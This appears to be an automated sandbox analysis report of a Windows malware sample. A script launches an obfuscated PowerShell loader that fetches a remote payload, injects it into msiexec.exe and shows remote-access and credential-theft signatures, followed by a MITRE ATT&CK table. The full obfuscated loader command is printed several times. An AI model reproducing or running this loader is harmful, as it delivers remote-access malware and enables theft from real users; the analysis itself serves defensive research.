              Source: wscript.exe, 00000000.00000002.1070116325.000002102138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000002.1070551829.0000021023281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1053648095.0000021023281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1068591331.00000210213E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1053446598.0000021023281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1068688455.0000021023281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1053573900.00000210213BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1053404315.0000021021398000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1069015190.0000021023281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1052913501.0000021023281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1070326409.00000210213E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1338372516.00000217A1C11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000007.00000002.2344725284.000001993A82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: PING.EXE, 00000002.00000002.1062528140.0000027AEECD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_072C09B8 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,14_2_072C09B8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_6344.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6344, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5904, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHHJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $chairlift;function opgrelsesdatoer($perdricide){ .($buenas) ($perdricide)} function ampler($envoyjcs){$demineraliserings=4;do{$yamshik+=$envoyjcs[$demineraliserings];$demineraliserings+=5;$tenebrosity=format-list} until(!$envoyjcs[$demineraliserings])$yamshik}$meddelagtig=ampler 'ho ensp jesepatooph..nglw';$meddelagtig+=ampler ' herebldgbstudccroclisoci reaef ignpseut';$marginellidae=ampler 'kravm sunokampzvariiracil mullun aakrad/';$libretto=ampler 'rec.tcerildjersunst1dobb2';$trediveaarsfdselsdagene='ki l[sortn ceces rotsamm.ambls.emoe klarsuppvtun iup,lcsu.fe.awtploy o icai k fnsibetpar ml upa tacn pa asigggfaite porr esk]cape:d fe:bltesexigeastrcblafu mi rnyanidisitpaady sk pbirercircotinftsaldot.evcc.asoabyillabe= udp$udviltortio thbencar speeblewtru.dtwillo';$marginellidae+=ampler 'noni5 ui.zaza0p da e.v(buggwkommi counomlad endoaf,twafskskore ghetn domtra e t ks1told0upfu.orch0 kai;.mpe ,egewti.vi ko,n fut6 sta4rube;ps.u kvarxcald6kuki4skin;posi glacrdimnvfrmn:effe1ti e3ext 4zinn. mod0pind)fald osghan epushcantikhydro dor/ ago2cali0tl.e1terp0sa k0d if1uafl0 d s1s gu lyssf se,i pirr.apie corfsh nopeelx ban/be.e1tann3seiz4 sho. una0';$lygteples240=ampler 'kursubarnslonge balrl.ng-sunragodkgunsheo ernove.t';$garanteret=ampler 'prodhtapetricktpronp sabsudvi:.ere/co o/gasldformr ur,ic tovhoa e c n. ludgmi tolarvoacangbrstlunreecolo. blocwantogen,mty n/hernubr tcknar?galoe tvixb trpba toregnrracitp la=vinddplanoal owst.knk oklpebeosheda geadhove&a kai unbdviru=envi1 dsdlobjeutale6 domo erobengarros mbrd hbariw inet ar9cha koutamspil-fjorjba lnnaadgsyno8checeteatukertzcapipparcgfolkdrekrntowp-geos8.elvkwindgsev h op 8kalcm';$lvfaldet=ampler 'mi.d>';$buenas=ampler ' dgri .arelinjx';$brugstyveriers='flippermaskiner';$bajerflasker='\foremilks.sig';opgrelsesdatoer (ampler 'bulg$dratggalilundeocolobtrila coml red:unwrdmancicompv klai ta dstdpe plorbamsestan=flok$ caves.mtnstanvsub,:gl cah.kep vitp sped omrafangtv poaarte+awin$unjubboliavandjvarmegeorr s.cf nonlsus a splsoverk ca,e dkkr');opgrelsesdatoer (ampler 'or r$saddg in lx,nook rrbparaahylil h,r:ejerdopile skokredeluds,ape.dmchopaallitas lires,o disnlears whin kreuaggrm sparf.rlerecithapssdest=bsse$tegngyuccazophrdemaabragnsvent vseek,onr yste hoptsabu.biltsovipp aikl botisummtfibr(blue$ we lbaarvmaxcf kvaaportlsygedemmee.nfetsn g)');opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$garanteret=$deklamationsnumrets[0];$multilobulated=(ampler ' aut$ istgj hnllikvo hotbswasa kralcont:spo i afbnstanf mi ooreor ve mcol,acompt nomic,eno pepnco.rsdolldunpoer.sbl bessu.va=fr sng dseskinw gen- melopengbdivijgrabetraac mu tgr,v taarsetaayisolsballt da,esekumled .cel $datam be epr fd atad alperinglhi eavinegtammt masi smog');opgrelsesdatoer ($multilobulated);opgrelsesdatoer (ampler 't,rs$vir i kunnselefud,to s.ermikrmafvramavetformifainok innjydesindedfinaegob,l oods slg. balhh
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $chairlift;function opgrelsesdatoer($perdricide){ .($buenas) ($perdricide)} function ampler($envoyjcs){$demineraliserings=4;do{$yamshik+=$envoyjcs[$demineraliserings];$demineraliserings+=5;$tenebrosity=format-list} until(!$envoyjcs[$demineraliserings])$yamshik}$meddelagtig=ampler 'ho ensp jesepatooph..nglw';$meddelagtig+=ampler ' herebldgbstudccroclisoci reaef ignpseut';$marginellidae=ampler 'kravm sunokampzvariiracil mullun aakrad/';$libretto=ampler 'rec.tcerildjersunst1dobb2';$trediveaarsfdselsdagene='ki l[sortn ceces rotsamm.ambls.emoe klarsuppvtun iup,lcsu.fe.awtploy o icai k fnsibetpar ml upa tacn pa asigggfaite porr esk]cape:d fe:bltesexigeastrcblafu mi rnyanidisitpaady sk pbirercircotinftsaldot.evcc.asoabyillabe= udp$udviltortio thbencar speeblewtru.dtwillo';$marginellidae+=ampler 'noni5 ui.zaza0p da e.v(buggwkommi counomlad endoaf,twafskskore ghetn domtra e t ks1told0upfu.orch0 kai;.mpe ,egewti.vi ko,n fut6 sta4rube;ps.u kvarxcald6kuki4skin;posi glacrdimnvfrmn:effe1ti e3ext 4zinn. mod0pind)fald osghan epushcantikhydro dor/ ago2cali0tl.e1terp0sa k0d if1uafl0 d s1s gu lyssf se,i pirr.apie corfsh nopeelx ban/be.e1tann3seiz4 sho. una0';$lygteples240=ampler 'kursubarnslonge balrl.ng-sunragodkgunsheo ernove.t';$garanteret=ampler 'prodhtapetricktpronp sabsudvi:.ere/co o/gasldformr ur,ic tovhoa e c n. ludgmi tolarvoacangbrstlunreecolo. blocwantogen,mty n/hernubr tcknar?galoe tvixb trpba toregnrracitp la=vinddplanoal owst.knk oklpebeosheda geadhove&a kai unbdviru=envi1 dsdlobjeutale6 domo erobengarros mbrd hbariw inet ar9cha koutamspil-fjorjba lnnaadgsyno8checeteatukertzcapipparcgfolkdrekrntowp-geos8.elvkwindgsev h op 8kalcm';$lvfaldet=ampler 'mi.d>';$buenas=ampler ' dgri .arelinjx';$brugstyveriers='flippermaskiner';$bajerflasker='\foremilks.sig';opgrelsesdatoer (ampler 'bulg$dratggalilundeocolobtrila coml red:unwrdmancicompv klai ta dstdpe plorbamsestan=flok$ caves.mtnstanvsub,:gl cah.kep vitp sped omrafangtv poaarte+awin$unjubboliavandjvarmegeorr s.cf nonlsus a splsoverk ca,e dkkr');opgrelsesdatoer (ampler 'or r$saddg in lx,nook rrbparaahylil h,r:ejerdopile skokredeluds,ape.dmchopaallitas lires,o disnlears whin kreuaggrm sparf.rlerecithapssdest=bsse$tegngyuccazophrdemaabragnsvent vseek,onr yste hoptsabu.biltsovipp aikl botisummtfibr(blue$ we lbaarvmaxcf kvaaportlsygedemmee.nfetsn g)');opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$garanteret=$deklamationsnumrets[0];$multilobulated=(ampler ' aut$ istgj hnllikvo hotbswasa kralcont:spo i afbnstanf mi ooreor ve mcol,acompt nomic,eno pepnco.rsdolldunpoer.sbl bessu.va=fr sng dseskinw gen- melopengbdivijgrabetraac mu tgr,v taarsetaayisolsballt da,esekumled .cel $datam be epr fd atad alperinglhi eavinegtammt masi smog');opgrelsesdatoer ($multilobulated);opgrelsesdatoer (ampler 't,rs$vir i kunnselefud,to s.ermikrmafvramavetformifainok innjydesindedfinaegob,l oods slg. balhh
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $chairlift;function opgrelsesdatoer($perdricide){ .($buenas) ($perdricide)} function ampler($envoyjcs){$demineraliserings=4;do{$yamshik+=$envoyjcs[$demineraliserings];$demineraliserings+=5;$tenebrosity=format-list} until(!$envoyjcs[$demineraliserings])$yamshik}$meddelagtig=ampler 'ho ensp jesepatooph..nglw';$meddelagtig+=ampler ' herebldgbstudccroclisoci reaef ignpseut';$marginellidae=ampler 'kravm sunokampzvariiracil mullun aakrad/';$libretto=ampler 'rec.tcerildjersunst1dobb2';$trediveaarsfdselsdagene='ki l[sortn ceces rotsamm.ambls.emoe klarsuppvtun iup,lcsu.fe.awtploy o icai k fnsibetpar ml upa tacn pa asigggfaite porr esk]cape:d fe:bltesexigeastrcblafu mi rnyanidisitpaady sk pbirercircotinftsaldot.evcc.asoabyillabe= udp$udviltortio thbencar speeblewtru.dtwillo';$marginellidae+=ampler 'noni5 ui.zaza0p da e.v(buggwkommi counomlad endoaf,twafskskore ghetn domtra e t ks1told0upfu.orch0 kai;.mpe ,egewti.vi ko,n fut6 sta4rube;ps.u kvarxcald6kuki4skin;posi glacrdimnvfrmn:effe1ti e3ext 4zinn. mod0pind)fald osghan epushcantikhydro dor/ ago2cali0tl.e1terp0sa k0d if1uafl0 d s1s gu lyssf se,i pirr.apie corfsh nopeelx ban/be.e1tann3seiz4 sho. una0';$lygteples240=ampler 'kursubarnslonge balrl.ng-sunragodkgunsheo ernove.t';$garanteret=ampler 'prodhtapetricktpronp sabsudvi:.ere/co o/gasldformr ur,ic tovhoa e c n. ludgmi tolarvoacangbrstlunreecolo. blocwantogen,mty n/hernubr tcknar?galoe tvixb trpba toregnrracitp la=vinddplanoal owst.knk oklpebeosheda geadhove&a kai unbdviru=envi1 dsdlobjeutale6 domo erobengarros mbrd hbariw inet ar9cha koutamspil-fjorjba lnnaadgsyno8checeteatukertzcapipparcgfolkdrekrntowp-geos8.elvkwindgsev h op 8kalcm';$lvfaldet=ampler 'mi.d>';$buenas=ampler ' dgri .arelinjx';$brugstyveriers='flippermaskiner';$bajerflasker='\foremilks.sig';opgrelsesdatoer (ampler 'bulg$dratggalilundeocolobtrila coml red:unwrdmancicompv klai ta dstdpe plorbamsestan=flok$ caves.mtnstanvsub,:gl cah.kep vitp sped omrafangtv poaarte+awin$unjubboliavandjvarmegeorr s.cf nonlsus a splsoverk ca,e dkkr');opgrelsesdatoer (ampler 'or r$saddg in lx,nook rrbparaahylil h,r:ejerdopile skokredeluds,ape.dmchopaallitas lires,o disnlears whin kreuaggrm sparf.rlerecithapssdest=bsse$tegngyuccazophrdemaabragnsvent vseek,onr yste hoptsabu.biltsovipp aikl botisummtfibr(blue$ we lbaarvmaxcf kvaaportlsygedemmee.nfetsn g)');opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$garanteret=$deklamationsnumrets[0];$multilobulated=(ampler ' aut$ istgj hnllikvo hotbswasa kralcont:spo i afbnstanf mi ooreor ve mcol,acompt nomic,eno pepnco.rsdolldunpoer.sbl bessu.va=fr sng dseskinw gen- melopengbdivijgrabetraac mu tgr,v taarsetaayisolsballt da,esekumled .cel $datam be epr fd atad alperinglhi eavinegtammt masi smog');opgrelsesdatoer ($multilobulated);opgrelsesdatoer (ampler 't,rs$vir i kunnselefud,to s.ermikrmafvramavetformifainok innjydesindedfinaegob,l oods slg. balhhJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000010.00000002.1795056108.00000000083FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-CPQ85KJump to behavior
              Source: Yara matchFile source: 00000010.00000002.1795056108.00000000083FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              311
              Process Injection
              11
              Masquerading
              OS Credential Dumping121
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              141
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Remote Access Software
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)311
              Process Injection
              Security Account Manager141
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Remote System Discovery
              SSHKeylogging13
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
